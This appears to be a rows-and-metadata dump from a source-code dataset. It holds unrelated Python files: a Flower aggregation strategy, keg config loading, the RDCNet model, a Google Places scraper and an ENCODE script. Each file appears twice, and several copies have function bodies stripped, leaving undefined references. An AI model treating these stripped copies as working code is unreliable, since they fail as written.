"""Aggregate fit results using weighted average (as in FedAvg)."""
return aggregate(results)
def on_aggregate_evaluate(
self, results: List[Tuple[int, float]], failures: List[BaseException]
) -> Optional[float]:
"""Aggregate evaluation losses using weighted average."""
return weighted_loss_avg(results)
| 39.3375 | 85 | 0.6762 | # Copyright 2020 Adap GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Configurable strategy implementation."""
from typing import Callable, List, Optional, Tuple
from flower.typing import Weights
from .aggregate import aggregate, weighted_loss_avg
from .strategy import Strategy
class DefaultStrategy(Strategy):
"""Configurable default strategy."""
# pylint: disable-msg=too-many-arguments
def __init__(
self,
fraction_fit: float = 0.1,
fraction_eval: float = 0.1,
min_fit_clients: int = 1,
min_eval_clients: int = 1,
min_available_clients: int = 1,
eval_fn: Optional[Callable[[Weights], Optional[Tuple[float, float]]]] = None,
) -> None:
"""Constructor."""
super().__init__()
self.min_fit_clients = min_fit_clients
self.min_eval_clients = min_eval_clients
self.fraction_fit = fraction_fit
self.fraction_eval = fraction_eval
self.min_available_clients = min_available_clients
self.eval_fn = eval_fn
def should_evaluate(self) -> bool:
"""Evaluate every round."""
return self.eval_fn is None
def num_fit_clients(self, num_available_clients: int) -> Tuple[int, int]:
"""Use a fraction of available clients for training."""
num_clients = int(num_available_clients * self.fraction_fit)
return max(num_clients, self.min_fit_clients), self.min_available_clients
def num_evaluation_clients(self, num_available_clients: int) -> Tuple[int, int]:
"""Use a fraction of available clients for evaluation."""
num_clients = int(num_available_clients * self.fraction_eval)
return max(num_clients, self.min_eval_clients), self.min_available_clients
def evaluate(self, weights: Weights) -> Optional[Tuple[float, float]]:
"""Evaluate model weights using an evaluation function (if provided)."""
if self.eval_fn is None:
# No evaluation function provided
return None
return self.eval_fn(weights)
def on_aggregate_fit(
self, results: List[Tuple[Weights, int]], failures: List[BaseException]
) -> Optional[Weights]:
"""Aggregate fit results using weighted average (as in FedAvg)."""
return aggregate(results)
def on_aggregate_evaluate(
self, results: List[Tuple[int, float]], failures: List[BaseException]
) -> Optional[float]:
"""Aggregate evaluation losses using weighted average."""
return weighted_loss_avg(results)
| 0 | 0 | 0 |
56c5e848525e61dd3c7e758898d25b65e43c59ba | 603 | py | Python | ex066.py | EduotavioFonseca/ProgramasPython | 8e0ef5f6f4239d1fe52321f8795b6573f6ff5130 | [
"MIT"
] | null | null | null | ex066.py | EduotavioFonseca/ProgramasPython | 8e0ef5f6f4239d1fe52321f8795b6573f6ff5130 | [
"MIT"
] | null | null | null | ex066.py | EduotavioFonseca/ProgramasPython | 8e0ef5f6f4239d1fe52321f8795b6573f6ff5130 | [
"MIT"
] | null | null | null | # Tabela do Brasileirão
times = ('Internacional', 'São Paulo', 'Flamengo', 'Atlético-MG', 'Palmeiras', 'Grêmio', 'Fluminense', 'Ceará',
'Santos', 'Corinthians', 'Bragantino', 'Athletico', 'Atlético-GO', 'Sport', 'Vasco', 'Fortaleza', 'Bahia',
'Goiás', 'Coritiba', 'Botafogo')
while True:
print()
print(f'Os 5 primeiros colocados são: {times[0:5]}')
print()
print(f'Os 4 últimos colocados são: {times[16:]}')
print()
print(f'Times: {sorted(times)}')
print()
print(f'O Bragantino está na posição: {times.index("Bragantino")+1}')
break
| 37.6875 | 116 | 0.60199 | # Tabela do Brasileirão
times = ('Internacional', 'São Paulo', 'Flamengo', 'Atlético-MG', 'Palmeiras', 'Grêmio', 'Fluminense', 'Ceará',
'Santos', 'Corinthians', 'Bragantino', 'Athletico', 'Atlético-GO', 'Sport', 'Vasco', 'Fortaleza', 'Bahia',
'Goiás', 'Coritiba', 'Botafogo')
while True:
print()
print(f'Os 5 primeiros colocados são: {times[0:5]}')
print()
print(f'Os 4 últimos colocados são: {times[16:]}')
print()
print(f'Times: {sorted(times)}')
print()
print(f'O Bragantino está na posição: {times.index("Bragantino")+1}')
break
| 0 | 0 | 0 |
aea92b50d275d2897a488416691716c9140ee10a | 6,979 | py | Python | keg/config.py | level12/keg | 6f148a9bd0b8e167007ed5c2a0000daf7de3aee2 | [
"BSD-3-Clause"
] | 15 | 2015-06-26T09:01:53.000Z | 2020-08-28T16:29:14.000Z | keg/config.py | level12/keg | 6f148a9bd0b8e167007ed5c2a0000daf7de3aee2 | [
"BSD-3-Clause"
] | 165 | 2015-03-27T06:49:38.000Z | 2022-03-11T21:39:52.000Z | keg/config.py | level12/keg | 6f148a9bd0b8e167007ed5c2a0000daf7de3aee2 | [
"BSD-3-Clause"
] | 9 | 2015-04-22T17:03:32.000Z | 2018-06-25T17:48:15.000Z | from __future__ import absolute_import
import os.path as osp
import appdirs
from blazeutils.helpers import tolist
import flask
from pathlib import PurePath
import six
from werkzeug.utils import (
import_string,
ImportStringError
)
from keg.utils import app_environ_get, pymodule_fpaths_to_objects
substitute = SubstituteValue
# The following three classes are default configuration profiles
| 34.549505 | 100 | 0.648947 | from __future__ import absolute_import
import os.path as osp
import appdirs
from blazeutils.helpers import tolist
import flask
from pathlib import PurePath
import six
from werkzeug.utils import (
import_string,
ImportStringError
)
from keg.utils import app_environ_get, pymodule_fpaths_to_objects
class ConfigurationError(Exception):
pass
class SubstituteValue(object):
def __init__(self, value):
self.value = value
substitute = SubstituteValue
class Config(flask.Config):
default_config_locations = [
# Keg's defaults
'keg.config.DefaultProfile',
# Keg's defaults for the selected profile
'keg.config.{profile}',
# App defaults for all profiles
'{app_import_name}.config.DefaultProfile',
# apply the profile specific defaults that are in the app's config file
'{app_import_name}.config.{profile}',
]
def from_obj_if_exists(self, obj_location):
try:
self.from_object(obj_location)
self.configs_found.append(obj_location)
except ImportStringError as e:
if obj_location not in str(e):
raise
def default_config_locations_parsed(self):
retval = []
for location in self.default_config_locations:
# if no profile is given, the location want's one, that location isn't valid
if '{profile}' in location and self.profile is None:
continue
retval.append(location.format(app_import_name=self.app_import_name,
profile=self.profile))
return retval
def init_app(self, app_config_profile, app_import_name, app_root_path, use_test_profile,
config_file_objs=None):
self.use_test_profile = use_test_profile
self.profile = app_config_profile
self.dirs = appdirs.AppDirs(app_import_name, appauthor=False, multipath=True)
self.app_import_name = app_import_name
self.app_root_path = app_root_path
self.config_paths_unreadable = []
if config_file_objs:
self.config_file_objs = config_file_objs
else:
self.config_file_objs = []
possible_config_fpaths = self.config_file_paths()
fpaths_to_objects = pymodule_fpaths_to_objects(possible_config_fpaths)
for fpath, objects, exc in fpaths_to_objects:
if objects is None:
self.config_paths_unreadable.append((fpath, exc))
else:
self.config_file_objs.append((fpath, objects))
if self.profile is None:
self.profile = self.determine_selected_profile()
self.configs_found = []
for dotted_location in self.default_config_locations_parsed():
dotted_location = dotted_location.format(app_import_name=app_import_name,
profile=self.profile)
self.from_obj_if_exists(dotted_location)
# apply settings from any of this app's configuration files
for fpath, objects in self.config_file_objs:
if self.profile in objects:
self.from_object(objects[self.profile])
self.configs_found.append('{}:{}'.format(fpath, self.profile))
sub_values = self.substitution_values()
self.substitution_apply(sub_values)
def config_file_paths(self):
dirs = self.dirs
config_fname = '{}-config.py'.format(self.app_import_name)
dpaths = []
if appdirs.system != 'win32':
dpaths.extend(dirs.site_config_dir.split(':'))
dpaths.append('/etc/{}'.format(self.app_import_name))
dpaths.append('/etc')
else:
system_drive = PurePath(dirs.site_config_dir).drive
system_etc_dir = PurePath(system_drive, '/', 'etc')
dpaths.extend((
dirs.site_config_dir,
system_etc_dir.joinpath(self.app_import_name).__str__(),
system_etc_dir.__str__()
))
dpaths.append(dirs.user_config_dir)
dpaths.append(osp.dirname(self.app_root_path))
fpaths = [osp.join(dpath, config_fname) for dpath in dpaths]
return fpaths
def email_error_to(self):
error_to = self.get('KEG_EMAIL_ERROR_TO')
override_to = self.get('KEG_EMAIL_OVERRIDE_TO')
if override_to:
return tolist(override_to)
return tolist(error_to)
def determine_selected_profile(self):
# if we find the value in the environment, use it
profile = app_environ_get(self.app_import_name, 'CONFIG_PROFILE')
if profile is not None:
return profile
use_test_profile = app_environ_get(self.app_import_name, 'USE_TEST_PROFILE', '')
if use_test_profile.strip() or self.use_test_profile:
return 'TestProfile'
# look for it in the app's main config file (e.g. myapp.config)
app_config = import_string('{}.config'.format(self.app_import_name), silent=True)
if app_config and hasattr(app_config, 'DEFAULT_PROFILE'):
profile = app_config.DEFAULT_PROFILE
# Look for it in all the config files found. This loops from lowest-priority config file
# to highest priority, so the last file found with a value is kept. Accordingly, any app
# specific file has priority over the app's main config file, which could be set just above.
for fpath, objects in self.config_file_objs:
if 'DEFAULT_PROFILE' in objects:
profile = objects['DEFAULT_PROFILE']
return profile
def substitution_values(self):
return dict(
user_log_dir=self.dirs.user_log_dir,
app_import_name=self.app_import_name,
)
def substitution_apply(self, sub_values):
for config_key, config_value in self.items():
if not isinstance(config_value, SubstituteValue):
continue
new_value = config_value.value.format(**sub_values)
self[config_key] = new_value
# The following three classes are default configuration profiles
class DefaultProfile(object):
KEG_DIR_MODE = 0o777
KEG_ENDPOINTS = dict(
home='public.home',
login='public.home',
after_login='public.home',
after_logout='public.home',
)
KEG_DB_DIALECT_OPTIONS = {}
class DevProfile(object):
DEBUG = True
class TestProfile(object):
DEBUG = True
TESTING = True
KEG_LOG_SYSLOG_ENABLED = False
# set this to allow generation of URLs without a request context
SERVER_NAME = 'keg.example.com' if six.PY3 else b'keg.example.com'
# simple value for testing is fine
SECRET_KEY = '12345'
# Sane default values for testing to get rid of warnings.
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:'
| 5,064 | 1,341 | 163 |
91b8f58f0aef4a4e4c306770d42549a707d7b742 | 5,038 | py | Python | rdcnet/models/rdcnet.py | fmi-basel/RDCNet | f1ebcab7b7325b08506b8da291a63c7c0470fe5f | [
"MIT"
] | 5 | 2020-10-07T03:48:56.000Z | 2021-05-27T06:28:41.000Z | rdcnet/models/rdcnet.py | fmi-basel/RDCNet | f1ebcab7b7325b08506b8da291a63c7c0470fe5f | [
"MIT"
] | null | null | null | rdcnet/models/rdcnet.py | fmi-basel/RDCNet | f1ebcab7b7325b08506b8da291a63c7c0470fe5f | [
"MIT"
] | 1 | 2021-06-25T10:32:02.000Z | 2021-06-25T10:32:02.000Z | import tensorflow as tf
import numpy as np
from tensorflow.keras import Model
from tensorflow.keras.layers import Input, LeakyReLU
from rdcnet.layers.nd_layers import get_nd_conv, get_nd_spatial_dropout, get_nd_conv_transposed
from rdcnet.layers.padding import DynamicPaddingLayer, DynamicTrimmingLayer
from rdcnet.layers.stacked_dilated_conv import StackedDilatedConv
def delta_loop(output_channels, recurrent_block, n_steps=3):
'''Recursively applies a given block to refine its output.
Args:
output_channels: number of output channels.
recurrent_block: a network taking (input_channels + output_channels) as
input and outputting output_channels
n_steps: number of times the block is applied
'''
return block
def rdc_block(n_groups=16,
dilation_rates=(1, 2, 4, 8, 16),
channels_per_group=32,
k_size=3,
spatial_dims=2,
dropout=0.1):
'''Grouped conv with stacked dilated conv in each group and pointwise convolution for mixing
Notes
-----
pre-activation to keep the residual path clear as described in:
HE, Kaiming, et al. Identity mappings in deep residual networks.
In: European conference on computer vision. Springer, Cham, 2016.
S. 630-645.
'''
Conv = get_nd_conv(spatial_dims)
channels = channels_per_group * n_groups
sd_conv = StackedDilatedConv(rank=spatial_dims,
filters=channels,
kernel_size=k_size,
dilation_rates=dilation_rates,
groups=n_groups,
activation=LeakyReLU())
# mixes ch/reduce from input_ch + channels_per_group*n_groups
reduce_ch_conv = Conv(channels, 1)
spatial_dropout = get_nd_spatial_dropout(spatial_dims)(dropout)
return _call
def GenericRDCnetBase(input_shape,
downsampling_factor,
n_downsampling_channels,
n_output_channels,
n_groups=16,
dilation_rates=(1, 2, 4, 8, 16),
channels_per_group=32,
n_steps=5,
dropout=0.1):
'''delta loop with input/output rescaling and atrous grouped conv recurrent block'''
spatial_dims = len(input_shape) - 1
downsampling_factor = tuple(
np.broadcast_to(np.array(downsampling_factor), spatial_dims).tolist())
recurrent_block = rdc_block(n_groups,
dilation_rates,
channels_per_group,
spatial_dims=spatial_dims,
dropout=dropout)
n_features = channels_per_group * n_groups
loop = delta_loop(n_features, recurrent_block, n_steps)
in_kernel_size = tuple(max(3, f) for f in downsampling_factor)
out_kernel_size = tuple(max(3, 2 * f) for f in downsampling_factor)
Conv = get_nd_conv(spatial_dims)
conv_in = Conv(n_downsampling_channels,
kernel_size=in_kernel_size,
strides=downsampling_factor,
padding='same')
ConvTranspose = get_nd_conv_transposed(spatial_dims)
conv_out = ConvTranspose(n_output_channels,
kernel_size=out_kernel_size,
strides=downsampling_factor,
padding='same')
input_padding = DynamicPaddingLayer(downsampling_factor,
ndim=spatial_dims + 2)
output_trimming = DynamicTrimmingLayer(ndim=spatial_dims + 2)
inputs = Input(shape=input_shape)
x = input_padding(inputs)
x = conv_in(x)
x = loop(x)
x = LeakyReLU()(x)
x = conv_out(x)
x = output_trimming([inputs, x])
name = 'RDCNet-F{}-DC{}-OC{}-G{}-DR{}-GC{}-S{}-D{}'.format(
_format_tuple(downsampling_factor),
n_downsampling_channels, n_output_channels, n_groups,
_format_tuple(dilation_rates), channels_per_group, n_steps, dropout)
return Model(inputs=inputs, outputs=[x], name=name)
| 34.040541 | 96 | 0.601826 | import tensorflow as tf
import numpy as np
from tensorflow.keras import Model
from tensorflow.keras.layers import Input, LeakyReLU
from rdcnet.layers.nd_layers import get_nd_conv, get_nd_spatial_dropout, get_nd_conv_transposed
from rdcnet.layers.padding import DynamicPaddingLayer, DynamicTrimmingLayer
from rdcnet.layers.stacked_dilated_conv import StackedDilatedConv
def delta_loop(output_channels, recurrent_block, n_steps=3):
'''Recursively applies a given block to refine its output.
Args:
output_channels: number of output channels.
recurrent_block: a network taking (input_channels + output_channels) as
input and outputting output_channels
n_steps: number of times the block is applied
'''
def block(x, state=None):
if state is None:
recurrent_shape = tf.concat(
[tf.shape(x)[:-1],
tf.constant([output_channels])], axis=0)
state = tf.zeros(recurrent_shape, x.dtype)
# static unrolling
for _ in range(n_steps): # static unrolled loop
delta = recurrent_block(tf.concat([x, state], axis=-1))
state = state + delta
return state
return block
def rdc_block(n_groups=16,
dilation_rates=(1, 2, 4, 8, 16),
channels_per_group=32,
k_size=3,
spatial_dims=2,
dropout=0.1):
'''Grouped conv with stacked dilated conv in each group and pointwise convolution for mixing
Notes
-----
pre-activation to keep the residual path clear as described in:
HE, Kaiming, et al. Identity mappings in deep residual networks.
In: European conference on computer vision. Springer, Cham, 2016.
S. 630-645.
'''
Conv = get_nd_conv(spatial_dims)
channels = channels_per_group * n_groups
sd_conv = StackedDilatedConv(rank=spatial_dims,
filters=channels,
kernel_size=k_size,
dilation_rates=dilation_rates,
groups=n_groups,
activation=LeakyReLU())
# mixes ch/reduce from input_ch + channels_per_group*n_groups
reduce_ch_conv = Conv(channels, 1)
spatial_dropout = get_nd_spatial_dropout(spatial_dims)(dropout)
def _call(x):
x = spatial_dropout(x)
x = LeakyReLU()(x)
x = reduce_ch_conv(x)
x = LeakyReLU()(x)
x = sd_conv(x)
return x
return _call
def _format_tuple(val):
unique_val = tuple(set(val))
if len(unique_val) == 1:
return str(unique_val[0])
else:
return str(val).replace(', ', '-').replace('(', '').replace(')', '')
def GenericRDCnetBase(input_shape,
downsampling_factor,
n_downsampling_channels,
n_output_channels,
n_groups=16,
dilation_rates=(1, 2, 4, 8, 16),
channels_per_group=32,
n_steps=5,
dropout=0.1):
'''delta loop with input/output rescaling and atrous grouped conv recurrent block'''
spatial_dims = len(input_shape) - 1
downsampling_factor = tuple(
np.broadcast_to(np.array(downsampling_factor), spatial_dims).tolist())
recurrent_block = rdc_block(n_groups,
dilation_rates,
channels_per_group,
spatial_dims=spatial_dims,
dropout=dropout)
n_features = channels_per_group * n_groups
loop = delta_loop(n_features, recurrent_block, n_steps)
in_kernel_size = tuple(max(3, f) for f in downsampling_factor)
out_kernel_size = tuple(max(3, 2 * f) for f in downsampling_factor)
Conv = get_nd_conv(spatial_dims)
conv_in = Conv(n_downsampling_channels,
kernel_size=in_kernel_size,
strides=downsampling_factor,
padding='same')
ConvTranspose = get_nd_conv_transposed(spatial_dims)
conv_out = ConvTranspose(n_output_channels,
kernel_size=out_kernel_size,
strides=downsampling_factor,
padding='same')
input_padding = DynamicPaddingLayer(downsampling_factor,
ndim=spatial_dims + 2)
output_trimming = DynamicTrimmingLayer(ndim=spatial_dims + 2)
inputs = Input(shape=input_shape)
x = input_padding(inputs)
x = conv_in(x)
x = loop(x)
x = LeakyReLU()(x)
x = conv_out(x)
x = output_trimming([inputs, x])
name = 'RDCNet-F{}-DC{}-OC{}-G{}-DR{}-GC{}-S{}-D{}'.format(
_format_tuple(downsampling_factor),
n_downsampling_channels, n_output_channels, n_groups,
_format_tuple(dilation_rates), channels_per_group, n_steps, dropout)
return Model(inputs=inputs, outputs=[x], name=name)
| 763 | 0 | 76 |
f4dfc6814251debd6daa61577a5da72dc7586bee | 5,854 | py | Python | scrape.py | TienDang2802/evs-scraper | 6538683e0e9db11a559022c8a9aafe67ed5024f6 | [
"MIT"
] | null | null | null | scrape.py | TienDang2802/evs-scraper | 6538683e0e9db11a559022c8a9aafe67ed5024f6 | [
"MIT"
] | null | null | null | scrape.py | TienDang2802/evs-scraper | 6538683e0e9db11a559022c8a9aafe67ed5024f6 | [
"MIT"
] | null | null | null | from googleplaces import GooglePlaces, types, lang
import googlemaps
import csv
from time import sleep
import requests
import sys
import re
from send_mail import *
if __name__ == '__main__':
scrape()
| 36.5875 | 116 | 0.569354 | from googleplaces import GooglePlaces, types, lang
import googlemaps
import csv
from time import sleep
import requests
import sys
import re
from send_mail import *
def scrape(query, city, filters_exclude, filters_include, user, uid):
results = [['Name', 'Company Domain', 'Phone Number', 'Company owner', 'Lifecycle stage', 'Country', 'City']]
results_process = process_filter(query, city, filters_exclude, filters_include, user)
if results_process:
results += results_process
# create file that will be send to user and admin (in BCC)
with open(str(user) + str(uid) + '_leads.csv', 'w', newline='') as f:
writer = csv.writer(f)
for result in results:
writer.writerow(result)
def process_filter(query, city, filters_exclude, filters_include, user, is_web=False):
results = []
query_list = query.split(',')
city_list = city.split(',')
filters_exclude_list = []
if filters_exclude != '':
filters_exclude_list = filters_exclude.split(',')
filters_exclude_list = [x.strip() for x in filters_exclude_list]
filters_include_list = []
if filters_include != '':
filters_include_list = filters_include.split(',')
filters_include_list = [x.strip() for x in filters_include_list]
total_city = len(city_list)
print('Total cities: {}'.format(total_city))
radius = int(os.environ.get('SEARCH_RADIUS'))
google_places_api = GooglePlaces(os.environ['GP_API_KEY1'])
gmaps = googlemaps.Client(key=os.environ['GP_API_KEY1'])
query_result = {}
for city in city_list:
print('Processing city: {}'.format(city))
for query in query_list:
print('Processing query string {} of city {} with radius={}'.format(query, city, radius))
geocode_result = gmaps.geocode(city)
latlng = '{}, {}'.format(geocode_result[0]['geometry']['location']['lat'],
geocode_result[0]['geometry']['location']['lng'])
try:
query_result = google_places_api.nearby_search(keyword=query, radius=radius, location=latlng)
except:
sleep(30)
try:
google_places_api2 = GooglePlaces(os.environ['GP_API_KEY2'])
query_result = google_places_api2.nearby_search(keyword=query, radius=radius, location=latlng)
except:
send_error(user)
while True:
if query_result:
for place in query_result.places:
place.get_details()
if place.website:
if filters_exclude_list:
if any(word.strip().lower() in place.name.lower() for word in filters_exclude_list):
print('exclude full continue')
continue
if not place.website or 'https' in place.website:
results.append(render_result(place, is_web))
continue
# filter
page_content_text = ''
try:
page_content = requests.get(place.website)
page_content_text = page_content.text
except Exception as e:
print('Error on line {}'.format(sys.exc_info()[-1].tb_lineno), type(e).__name__, e)
results.append(render_result(place, is_web))
if page_content_text and filters_exclude_list:
filter_exclude = is_filters_exclude(page_content_text, filters_exclude_list)
if filter_exclude:
print('Filter exclude')
continue
if page_content_text and filters_include_list:
filter_include = is_filters_include(page_content_text, filters_include_list)
if not filter_include:
print('Filter include')
continue
results.append(render_result(place, is_web))
if not query_result.has_next_page_token or is_web:
break
sleep(30)
print('Next page token: {}'.format(query_result.next_page_token))
query_result = google_places_api.nearby_search(
pagetoken=query_result.next_page_token
)
return results
def render_result(place, is_web=False):
if is_web:
return [place.name, place.website, place.formatted_address, place.international_phone_number, '']
return [
place.name,
place.website,
place.international_phone_number,
os.environ.get('NOTIFY_EMAIL'),
'Subscriber',
'',
''
]
def is_filters_exclude(place_website_content, filters_exclude_list):
for exclude in filters_exclude_list:
search = re.search(r'[^"\r\n]*' + str(exclude) + '[^"\r\n]*', place_website_content)
if search:
return True
return False
def is_filters_include(place_website_content, filters_include_list):
for include in filters_include_list:
search = re.search(r'[^"\r\n]*' + str(include) + '[^"\r\n]*', place_website_content)
if search:
return True
return False
def send_error(user):
toaddr = os.environ.get('ERROR_EMAIL')
subject = '{user} had a FATAL ERROR!'.format(user=str(user))
body = "Look into heroku logs and notify user"
send_mail(toaddr, subject, body)
if __name__ == '__main__':
scrape()
| 5,504 | 0 | 138 |
993feb043393adf3e48cbc1d5e09178f6b6122bf | 2,382 | py | Python | res_mods/mods/packages/xvm_battle/python/consts.py | peterbartha/ImmunoMod | cbf8cd49893d7082a347c1f72c0e39480869318a | [
"MIT"
] | null | null | null | res_mods/mods/packages/xvm_battle/python/consts.py | peterbartha/ImmunoMod | cbf8cd49893d7082a347c1f72c0e39480869318a | [
"MIT"
] | 1 | 2016-04-03T13:31:39.000Z | 2016-04-03T16:48:26.000Z | res_mods/mods/packages/xvm_battle/python/consts.py | peterbartha/ImmunoMod | cbf8cd49893d7082a347c1f72c0e39480869318a | [
"MIT"
] | null | null | null | """ XVM (c) www.modxvm.com 2013-2017 """
#####################################################################
# constants
# Shared commands
# Markers only commands
# Battle events
# Invalidation targets
# Spotted statuses
| 34.521739 | 127 | 0.689337 | """ XVM (c) www.modxvm.com 2013-2017 """
#####################################################################
# constants
# Shared commands
class XVM_BATTLE_COMMAND(object):
REQUEST_BATTLE_GLOBAL_DATA = "xvm_battle.request_battle_global_data"
XMQP_INIT = "xvm_battle.xmqp_init"
BATTLE_CTRL_SET_VEHICLE_DATA = "xvm_battle.battle_ctrl_set_vehicle_data"
CAPTURE_BAR_GET_BASE_NUM_TEXT = "xvm_battle.capture_bar_get_base_num_text"
MINIMAP_CLICK = "xvm_battle.minimap_click"
AS_RESPONSE_BATTLE_GLOBAL_DATA = "xvm.as.response_battle_global_data"
AS_XMQP_EVENT = "xvm.as.as_xmqp_event"
AS_UPDATE_PLAYER_STATE = "xvm.as.update_player_state"
AS_UPDATE_DEVICE_STATE = "xvm.as.update_device_state"
AS_TEAMS_HP_CHANGED = "xvm.as.teams_hp_changed"
AS_SNIPER_CAMERA = "xvm.as.sniper_camera"
AS_AIM_OFFSET_UPDATE = "xvm.as.aim_offset_update"
AS_ON_TARGET_CHANGED = "xvm.as.on_target_changed"
AS_MOVING_STATE_CHANGED = "xvm.as.as_moving_state_changed"
AS_STEREOSCOPE_TOGGLED = "xvm.as.as_stereoscope_toggled"
# Markers only commands
class XVM_VM_COMMAND(object):
# Flash -> Python
LOG = "xfw.log"
INITIALIZED = "initialized"
AS_CMD_RESPONSE = "xvm_vm.as.cmd_response"
# Battle events
class XVM_BATTLE_EVENT(object):
ARENA_INFO_INVALIDATED = "arena_info_invalidated"
XMQP_CONNECTED = 'xvm_battle.xmqp_connected'
XMQP_MESSAGE = 'xvm_battle.xmqp_message'
# Invalidation targets
class INV(object):
NONE = 0x00000000
VEHICLE_STATUS = 0x00000001 # ready, alive, not_available, stop_respawn
#PLAYER_STATUS = 0x00000002 # isActionDisabled, isSelected, isSquadMan, isSquadPersonal, isTeamKiller, isVoipDisabled
SQUAD_INDEX = 0x00000008
CUR_HEALTH = 0x00000010
MAX_HEALTH = 0x00000020
MARKS_ON_GUN = 0x00000040
SPOTTED_STATUS = 0x00000080
FRAGS = 0x00000100
HITLOG = 0x00010000
ALL_VINFO = VEHICLE_STATUS | SQUAD_INDEX | FRAGS # | PLAYER_STATUS
ALL_VSTATS = FRAGS
ALL_ENTITY = CUR_HEALTH | MAX_HEALTH | MARKS_ON_GUN
ALL = 0x0000FFFF
# Spotted statuses
class SPOTTED_STATUS(object):
NEVER_SEEN = 'neverSeen'
SPOTTED = 'spotted'
LOST = 'lost'
DEAD = 'dead'
class INT_CD(object):
STEREOSCOPE = 1273
| 0 | 2,015 | 138 |
41c9e613638a94d05eb2e8ceab952f4ed37e7164 | 2,187 | py | Python | tests/test_converter.py | billyrrr/onto | 72733d36a2583ae4758f7cf33a5229b79773702b | [
"MIT"
] | 1 | 2020-10-04T10:01:45.000Z | 2020-10-04T10:01:45.000Z | tests/test_converter.py | billyrrr/onto | 72733d36a2583ae4758f7cf33a5229b79773702b | [
"MIT"
] | null | null | null | tests/test_converter.py | billyrrr/onto | 72733d36a2583ae4758f7cf33a5229b79773702b | [
"MIT"
] | null | null | null | from onto.attrs import attribute
from onto.models.base import Serializable
from collections import namedtuple
graph_schema = namedtuple('graph_schema', ['op_type', 'name', 'graphql_object_type'])
| 21.441176 | 85 | 0.582533 | from onto.attrs import attribute
from onto.models.base import Serializable
class H(Serializable):
i = attribute.Attribute(type_cls=int, doc="I am 'i'.")
j = attribute.PropertyAttribute(
type_cls=str,
doc="""I am 'j'. See next line.
This is my second line.
"""
)
from collections import namedtuple
graph_schema = namedtuple('graph_schema', ['op_type', 'name', 'graphql_object_type'])
def test__schema_cls_from_attributed_class():
# import asyncio
# loop = asyncio.get_event_loop()
from onto.models.utils import _graphql_object_type_from_attributed_class
attributed = H
graphql_schema = _graphql_object_type_from_attributed_class(attributed)
async def sub(parent, info, **kwargs):
pass
#
from graphql import GraphQLObjectType
query_schema = GraphQLObjectType(
name='Query',
fields={
'h': graphql_schema
}
)
from gql import query, subscribe
@query
async def h(parent, info, **kwargs):
return {
'i': 1,
'j': 'one'
}
graph_schema(op_type='Query', name='h', graphql_object_type=graphql_schema)
@subscribe
async def h(parent, info, **kwargs):
# Register topic
# Listen to topic
for i in range(5):
import asyncio
await asyncio.sleep(i)
yield {
'h': {
'i': i,
'j': f"number is {i}"
}
}
subscription_schema = GraphQLObjectType(
name='Subscription',
fields={
'h': graphql_schema
}
)
from graphql import GraphQLSchema
schema = GraphQLSchema(
query=query_schema,
subscription=subscription_schema
)
from stargql import GraphQL
async def on_startup():
from asyncio.queues import Queue
global q
q = Queue()
async def shutdown():
pass
app = GraphQL(
schema=schema,
on_startup=[on_startup],
on_shutdown=[shutdown]
)
# import uvicorn
# uvicorn.run(app, port=8080, debug=True)
# return app
| 1,734 | 205 | 46 |
efd92e9172080bbf7288d421524737cd0652549d | 2,303 | py | Python | src/encode_task_subsample_ctl.py | motorny/chip-seq-pipeline2 | b4ffdfb977eb327f8495a42e077c62640cad8ea6 | [
"MIT"
] | 261 | 2017-10-18T04:59:35.000Z | 2022-03-28T08:15:33.000Z | src/encode_task_subsample_ctl.py | motorny/chip-seq-pipeline2 | b4ffdfb977eb327f8495a42e077c62640cad8ea6 | [
"MIT"
] | 272 | 2018-05-03T22:57:38.000Z | 2022-03-25T22:26:22.000Z | src/encode_task_subsample_ctl.py | motorny/chip-seq-pipeline2 | b4ffdfb977eb327f8495a42e077c62640cad8ea6 | [
"MIT"
] | 142 | 2017-08-23T23:44:14.000Z | 2022-03-18T20:53:26.000Z | #!/usr/bin/env python
import sys
import os
import argparse
from encode_lib_common import (
assert_file_not_empty, get_num_lines, log, ls_l, mkdir_p, rm_f,
run_shell_cmd, strip_ext_ta)
from encode_lib_genomic import (
subsample_ta_pe, subsample_ta_se)
if __name__ == '__main__':
main()
| 34.373134 | 82 | 0.604863 | #!/usr/bin/env python
import sys
import os
import argparse
from encode_lib_common import (
assert_file_not_empty, get_num_lines, log, ls_l, mkdir_p, rm_f,
run_shell_cmd, strip_ext_ta)
from encode_lib_genomic import (
subsample_ta_pe, subsample_ta_se)
def parse_arguments():
parser = argparse.ArgumentParser(
prog='ENCODE DCC control TAG-ALIGN subsampler.'
'This script does not check if number of reads in TA is higher than '
'subsampling number (--subsample). '
'If number of reads in TA is lower than subsampling number then '
'TA will be just shuffled.')
parser.add_argument('ta', type=str,
help='Path for control TAGALIGN file.')
parser.add_argument('--paired-end', action="store_true",
help='Paired-end TAGALIGN.')
parser.add_argument('--subsample', default=0, type=int,
help='Number of reads to subsample.')
parser.add_argument('--out-dir', default='', type=str,
help='Output directory.')
parser.add_argument('--log-level', default='INFO',
choices=['NOTSET', 'DEBUG', 'INFO',
'WARNING', 'CRITICAL', 'ERROR',
'CRITICAL'],
help='Log level')
args = parser.parse_args()
if not args.subsample:
raise ValueError('--subsample should be a positive integer.')
log.setLevel(args.log_level)
log.info(sys.argv)
return args
def main():
# read params
args = parse_arguments()
log.info('Initializing and making output directory...')
mkdir_p(args.out_dir)
if args.paired_end:
subsampled_ta = subsample_ta_pe(
args.ta, args.subsample,
non_mito=False, mito_chr_name=None, r1_only=False,
out_dir=args.out_dir)
else:
subsampled_ta = subsample_ta_se(
args.ta, args.subsample,
non_mito=False, mito_chr_name=None,
out_dir=args.out_dir)
log.info('Checking if output is empty...')
assert_file_not_empty(subsampled_ta)
log.info('List all files in output directory...')
ls_l(args.out_dir)
log.info('All done.')
if __name__ == '__main__':
main()
| 1,953 | 0 | 46 |
2101b659c05c618a0d1a94ae66118ffd25c67ab5 | 3,804 | py | Python | main.py | allgreed/pynetkit | 404142fbc21ae5b771f881d4b406fc53680b4e3b | [
"MIT"
